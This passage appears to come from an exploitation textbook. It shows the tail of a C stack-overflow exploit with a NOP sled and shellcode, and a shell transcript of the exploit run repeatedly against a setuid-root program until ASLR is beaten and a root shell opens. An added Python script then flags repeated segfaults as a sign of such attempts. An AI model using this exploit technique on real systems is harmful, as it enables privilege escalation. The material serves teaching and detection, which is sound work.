for(i=0; i < 90; i+=4) // Fill buffer with return address.
   *((unsigned int *)(buffer+i)) = ret;
memset(buffer+84, 0x90, 900); // Build NOP sled.
memcpy(buffer+900, shellcode, sizeof(shellcode));
execl("./aslr_demo", "aslr_demo", buffer, NULL);
}
This code should make sense to you. The value 200 is added to the return
address to skip over the first 90 bytes used for the overwrite, so execution lands
somewhere in the NOP sled.
reader@hacking:~/booksrc $ sudo chown root ./aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s ./aslr_demo
reader@hacking:~/booksrc $ gcc aslr_execl_exploit.c
reader@hacking:~/booksrc $ ./a.out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3.2# exit
exit
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfb5a38c
ret addr is 0xbfb5a068
buffer is at 0xbfb20760
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfb5a38c - 0xbfb20760"
$1 = 236588
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfce050c
ret addr is 0xbfce01e8
buffer is at 0xbfce0130
sh-3.2# whoami
root
sh-3.2#
As you can see, the randomization occasionally causes the exploit to fail,
but it only needs to succeed once. This leverages the fact that we can try the
exploit as many times as we want. The same technique will work with the
notesearch exploit while ASLR is running. Try writing an exploit to do this.
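The flip side of "it only needs to succeed once" is that every failed guess leaves a crash behind. The following is an added example, not from the book: it parses kernel-style segfault reports from a constructed log excerpt (timestamps, PIDs, stack pointers and error codes are made up; the aslr_demo addresses mirror the transcript above) and flags any program that crashes repeatedly within a short window, noting how many of those crashes faulted on instruction fetch, as a bad return-address guess does.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Kernel x86 segfault report: comm[pid]: segfault at ADDR ip IP sp SP error N in OBJ[START+SIZE]
SEGFAULT_RE = re.compile(
    r"^(?P<ts>\S+) kernel: (?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at "
    r"(?P<addr>[0-9a-f]+) ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) "
    r"error (?P<err>\d+) in (?P<obj>\S+)"
)
# Constructed log excerpt: timestamps, PIDs, sp values and error codes are made up;
# the aslr_demo addresses are the guessed return addresses from the failed runs above.
SAMPLE_LOG = """\
2008-01-01T12:00:01 kernel: aslr_demo[4101]: segfault at b79f6de4 ip b79f6de4 sp bfa3ee78 error 14 in aslr_demo[8048000+1000]
2008-01-01T12:00:02 kernel: firefox[2201]: segfault at 0 ip b7e4c1a0 sp bfc0f2b0 error 4 in libxul.so[b7c00000+900000]
2008-01-01T12:00:03 kernel: aslr_demo[4103]: segfault at bfb5a068 ip bfb5a068 sp bfb20768 error 14 in aslr_demo[8048000+1000]
2008-01-01T12:00:05 kernel: aslr_demo[4106]: segfault at bfce01e8 ip bfce01e8 sp bfce0138 error 14 in aslr_demo[8048000+1000]
"""

def parse_segfaults(log_text):
    """Yield one dict per recognised segfault line."""
    for line in log_text.splitlines():
        m = SEGFAULT_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            # On an instruction-fetch fault the faulting address equals ip: execution
            # jumped somewhere unmapped. A plain data fault (the firefox line) does not.
            rec["cf_hijack_like"] = rec["addr"] == rec["ip"]
            yield rec

def flag_repeated_crashes(log_text, window=timedelta(seconds=60), threshold=3):
    """Return {comm: (max_crashes_in_window, hijack_like_total)} for programs
    that crashed at least `threshold` times inside any `window`-long span."""
    by_comm = defaultdict(list)
    for rec in parse_segfaults(log_text):
        by_comm[rec["comm"]].append(rec)
    flagged = {}
    for comm, recs in by_comm.items():
        recs.sort(key=lambda r: r["ts"])
        start, best = 0, 0
        for end in range(len(recs)):  # sliding window over sorted crash times
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hijack_like = sum(r["cf_hijack_like"] for r in recs)
            flagged[comm] = (best, hijack_like)
    return flagged
```

Feeding the sample flags only aslr_demo, with all three of its crashes looking like control-flow hijacks, while the single firefox data fault is ignored.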
Once the basic concepts of exploiting programs are understood, countless
variations are possible with a little bit of creativity. Since the rules of a program
are defined by its creators, exploiting a supposedly secure program is simply a
matter of beating them at their own game. New clever methods, such as stack
guards and IDSs, try to compensate for these problems, but these solutions
aren't perfect either. A hacker's ingenuity tends to find holes in these systems.
Just think of the things they didn't think of.